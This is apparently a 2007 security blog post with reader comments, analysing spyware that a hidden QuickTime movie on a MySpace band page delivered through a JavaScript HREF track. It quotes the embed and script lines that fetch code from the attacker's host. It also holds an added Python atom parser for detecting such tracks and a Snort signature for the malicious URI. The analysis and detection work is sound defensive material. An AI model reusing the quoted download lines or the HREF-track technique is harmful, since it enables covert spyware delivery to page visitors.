Here’s an interesting infection vector, used by a new malware: it’s a QuickTime movie!
McAfee VirusScan detects the malware as JS/SpaceTalk Trojan. The description for this malware is empty, so your guess at the characteristics of this malware is as good as mine.
Interested in the details? Read on!
This Myspace page (of a French rockband) has an embedded QuickTime movie. Here’s the EMBED HTML tag in the source (I changed the formatting to make it more readable):
<embed enableJavascript="false" allowScriptAccess="never" allownetworking="internal" src=http://profileawareness.com/tys4.mov hidden=true />
The EMBED tag instructs your browser to play a movie when it renders the HTML page. But in this case, the movie is hidden (attribute hidden is true). It’s a QuickTime movie, downloaded from the profileawareness.com server.
This tys4.mov QuickTime movie is sneaky: it contains JavaScript code to download and execute another JavaScript program. QuickTime has a feature that allows you to embed URLs or JavaScript in a movie. Apple calls this feature HREF tracks. From the Apple site:
An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that load QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.
An HREF track is not meant to be displayed; it simply contains link information. The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.
The syntax for an HREF track is simple; here’s an example that automatically loads the page http://www.google.com 1 minute into the movie:
[00:01:00.00] A<http://www.google.com> T<frame>
Let’s take a look inside the tys4.mov QuickTime movie. First we use the strings command to dump all strings contained in this QuickTime file.
strings tys4.mov
Here is what we see at the end of the dump:
Do you recognize the syntax at the end: A<javascript> T<>
It will automatically execute a JavaScript script when the movie is played (since there is no timestamp, the script executes immediately).
The script is simple: it creates a script tag and adds it to the HTML page, thereby downloading and executing a new script from the profileawareness server:
<script src='http://profileawareness.com/logs4/sqltrack.js'/>
It’s this script that is detected by McAfee (at the moment of writing, McAfee was the only antivirus on VirusTotal to detect this script).
The QuickTime file format is a binary, hierarchical stream of atoms.
Qtatomizer is a tool to display this hierarchy of atoms.
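As an added example (not Didier’s code and not Qtatomizer), the script below walks the atom hierarchy just described and applies the HREF track syntax from above to every leaf atom, flagging descriptors whose URL is a javascript: URL; the sample movie bytes are constructed for the demo and are not tys4.mov.

```python
import re
import struct

# Atom types that hold child atoms (QuickTime containers we recurse into).
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"udta", b"edts"}

# HREF track descriptor: optional [hh:mm:ss.ff] timestamp, A<url> (automatic)
# or <url> (interactive), optional T<target> frame specifier.
HREF_RE = re.compile(
    rb"(?:\[(?P<ts>\d\d:\d\d:\d\d\.\d\d)\]\s*)?"
    rb"(?P<auto>A)?<(?P<url>[^<>]+)>"
    rb"(?:\s*T<(?P<target>[^<>]*)>)?"
)

def walk_atoms(data, offset=0, end=None, depth=0):
    """Yield (depth, type, payload) for every atom, recursing into containers."""
    end = len(data) if end is None else end
    while offset + 8 <= end:
        size, kind = struct.unpack(">I4s", data[offset:offset + 8])
        header = 8
        if size == 1 and offset + 16 <= end:  # 64-bit extended size follows the type
            size, header = struct.unpack(">Q", data[offset + 8:offset + 16])[0], 16
        elif size == 0:  # atom extends to the end of the enclosing range
            size = end - offset
        if size < header or offset + size > end:
            break  # malformed or truncated atom: stop instead of looping forever
        yield depth, kind, data[offset + header:offset + size]
        if kind in CONTAINERS:
            yield from walk_atoms(data, offset + header, offset + size, depth + 1)
        offset += size

def find_href_descriptors(data):
    """Return one dict per HREF descriptor found in the bytes of any leaf atom."""
    found = []
    for _depth, kind, payload in walk_atoms(data):
        if kind in CONTAINERS:
            continue
        for m in HREF_RE.finditer(payload):
            url = m.group("url").decode("latin-1")
            tgt = m.group("target")
            found.append({"atom": kind.decode("latin-1"), "url": url,
                          "timestamp": m.group("ts").decode() if m.group("ts") else None,
                          "automatic": m.group("auto") is not None,
                          "target": tgt.decode("latin-1") if tgt is not None else None,
                          "script": url.lower().startswith("javascript:")})
    return found

def atom(kind, payload):
    """Build an atom: 32-bit big-endian size (header included) + 4-char type."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload

def text_sample(text):
    """QuickTime text sample: 16-bit big-endian length prefix followed by the text."""
    return struct.pack(">H", len(text)) + text

# Constructed sample movie (not the real tys4.mov): a tiny atom tree plus two HREF
# descriptors in mdat, one timed and benign, one immediate javascript: URL.
SAMPLE_MOV = (
    atom(b"ftyp", b"qt  " + b"\0" * 8)
    + atom(b"moov", atom(b"trak", atom(b"mdia", atom(b"hdlr", b"\0\0\0\0mhlrtext"))))
    + atom(b"mdat", text_sample(b"[00:01:00.00] A<http://www.google.com> T<frame>")
           + text_sample(b"A<javascript:x()> T<>"))
)
```

Run against a real .mov, the script: descriptors come only from the bytes in the file, so an untimed automatic javascript: entry is exactly the pattern the strings dump above showed.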
The QuickTime movie is what is known as a Downloader, but AV programs do not detect it.
The downloaded script is just spyware: it collects data about the Myspace user viewing the page and uploads it to the profileawareness server.
To summarize the actions:
• You visit a website
• It plays a hidden QuickTime movie
• The QuickTime movie automatically downloads a JavaScript program
• The JavaScript program is executed
*shakes a fist at QuickTime trying to do too much*
Nice analysis, Didier! I always like reading your posts like this, as they are easy to follow and give a really good example/tutorial for those of us who’ve not done something like this before.
Comment by LonerVamp — Monday 12 March 2007 @ 13:40
Wow, good job! I never suspected that Quicktime movies could be used as an attack vector. Oh my, think about how effective this could be if the sites peddling free pr0n samples would start using this technique.
Btw, I’m pretty sure the technical term here should be “Pwnt” or “Pwned”. This is the first time I saw someone spell it “P0wned”. 😉
Comment by Luke — Monday 12 March 2007 @ 14:07
Thanks.
About P0wned: I was inspired by Harlan’s post “P0wned by certs” (http://windowsir.blogspot.com/2007/01/p0wned-by-certs.html)
Comment by Didier Stevens — Monday 12 March 2007 @ 14:15
[…] you know that you can embed JS scripts in Apple Quicktime movies? (the feature is called “HREF tracks”) An HREF track is a special type of text track […]
Pingback by QuickTime movies as malware infection vector at Security Samizdat — Monday 12 March 2007 @ 15:11
nice analysis, QuickTime has a few other issues similar to this one. You can read about them here:
http://www.gnucitizen.org/blog/backdooring-quicktime-movies/
http://www.gnucitizen.org/blog/backdooring-mp3-files/
Comment by pdp — Monday 12 March 2007 @ 17:36
[…] Here’s a link to the blog entry: https://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/ […]
Pingback by average admins » Blog Archive » P0wned by a QT movie — Monday 12 March 2007 @ 21:07
This exploit vector should have been taken care of with the Quicktime 7.1.5 update (dating March 6th).
http://developer.apple.com/documentation/QuickTime/Conceptual/QTScripting_JavaScript/bQTScripting_JavaScri_Document/chapter_1000_section_4.html
As your article was published March 12th I’m surprised that you did not include any information about this update.
Regards,
Joachim
Comment by Joachim Buechse — Friday 16 March 2007 @ 11:30
Thanks Didier, good info.
Symantec now sees the Javascript sqltrack.js as Infostealer.
Steve
Comment by Steve — Friday 16 March 2007 @ 11:48
Anyone think of a little ‘poison the well’ approach with the javascript? IE, sending a bunch of crap to fill their tracking server… I know I’ve thought of it.
Comment by bongo mcginty — Friday 16 March 2007 @ 13:02
Hello,
Does anyone know if this vulnerability was patched with the update that Apple released last week? Specifically, I’m thinking of:
CVE-ID: CVE-2006-4965, CVE-2007-0059
Available for: Mac OS X v10.3.9 and later, Windows Vista/XP/2000
Impact: Viewing a maliciously-crafted QuickTime movie file or QTL file may lead to arbitrary JavaScript code execution in context of the local domain
Description: A cross-zone scripting issue exists in QuickTime’s browser plugin. By enticing a user to open a malicious QuickTime movie file or QTL file, an attacker can trigger the issue, which may lead to arbitrary JavaScript code execution in context of the local domain. This issue has been described on the Month of Apple Bugs web site (MOAB-03-01-2007). This update addresses the issue by performing additional validation of QuickTime movie files and QTL files.
http://docs.info.apple.com/article.html?artnum=305149
Comment by Dan Goodin — Friday 16 March 2007 @ 14:03
This is the same old problem as ‘doze media player has been suffering from for years: they call them ‘url flips’. See, e.g.
http://marc.theaimsgroup.com/?l=bugtraq&m=101447771102582&w=2
http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0112.html
for a couple of malicious uses.
Comment by DaveK — Friday 16 March 2007 @ 16:39
[…] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from […]
Pingback by Computer Security Research - McAfee Avert Labs Blog — Friday 16 March 2007 @ 17:24
Apple fixed a similar issue in 7.1.5. Check http://docs.info.apple.com/article.html?artnum=305149
and search for scripting.
Are you using 7.1.5? If so, did you actually see any script execution, or are you just going by the McAfee alert?
Comment by Anonymous — Saturday 17 March 2007 @ 4:31
Could a JavaScript run an executable through the Apple QuickTime flaw? Just asking because I have been infected by malware and I think this could be the technique. And a little example if this can be done. Thank you in advance.
Comment by priv8 — Saturday 17 March 2007 @ 12:43
MySpace has a QuickTime exploit
As already discovered almost a week ago, there is an exploit on MySpace in .mov movies (e.g. when visiting the band Mamasaid.. when you open it, a script is executed in the background.
“The script determines the Myspace username of the …
Trackback by grafikworkX - the design factory — Sunday 18 March 2007 @ 5:29
[…] that acts as the spyware, according to the researcher, Didier Stevens, who documents his findings here. http://www.theregister.com/2007/03/16/myspace_quicktime_exploit/ Share this post: email it! | […]
Pingback by DP's Security Bits : MySpace-hosted malware exploits QuickTime flaw — Sunday 18 March 2007 @ 8:30
@Joachim
> As your article was published March 12th I’m surprised that you did not include any information about this update.
The explanation is very simple: I discovered this and wrote the article before Apple published a fix, and I was not aware that Apple had released a fix for this when I published the article. I don’t use QT, it’s not installed on my systems.
Comment by Didier Stevens — Sunday 18 March 2007 @ 13:42
@priv8
Yes, the JavaScript could exploit a browser vulnerability to execute an executable in the user’s security context.
Comment by Didier Stevens — Sunday 18 March 2007 @ 13:51
Can you go into more detail on the last comment? What type of browser vulnerability would need to exist to execute an executable from Javascript?
Comment by Anonymous — Sunday 18 March 2007 @ 17:11
[…] version (7.1.5) without support for JavaScript. This happened about a week before I posted “P0wned by a QT movie”. I had analyzed the infection and written (but not published) my post before Apple published the […]
Pingback by Update: P0wned by a QT movie « Didier Stevens — Sunday 18 March 2007 @ 19:14
@Anonymous
ADODB.Stream for example, http://www.f-secure.com/v-descs/adodb_stream.shtml
Comment by Didier Stevens — Monday 19 March 2007 @ 11:36
[…] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from […]
Pingback by Chris Mosby at myITforum.com : McAfee Avert Labs Blog - MySpace Woes: Trojan Targets French Rock Band Fans - Friday March 16, 2007 — Monday 19 March 2007 @ 16:14
Posted a Snort sig to BleedingThreats.net.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE CURRENT EVENTS SpaceTalk-QT-js"; flow:to_server,established; uricontent:"/logs4/sqltrack.js"; nocase; classtype:trojan-activity; reference:url,didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/; sid:2003507; rev:1;)
Comment by Russ McRee — Monday 19 March 2007 @ 17:57
[…] to execute scriptable content in the context of the current website. Didier Stevens has a nice write up of the particular exploit. Though it appears patched with the latest version of Quicktime it […]
Pingback by :: Binary Paradox :: » Blog Archive » A Eulogy for Flatfiles — Monday 19 March 2007 @ 18:02
I am protected by McAfee…but have this trojan I suspect…is it possible that somehow this malware or whatever can disable my virus protection? There have been a few occasions when I have found my protection disabled, yet I hadn’t disabled it.
Elizabeth
Comment by Elizabeth m Maloney — Wednesday 28 March 2007 @ 1:57
Yes, a lot of malware programs can disable security software, like AV. However, most of them can only do this when you run as local admin.
Comment by Didier Stevens — Sunday 1 April 2007 @ 18:49
I think I’ve read something similar a few days ago. I don’t remember where, might have been on digg.com or slashdot.
Comment by kevstelo — Monday 11 June 2007 @ 7:30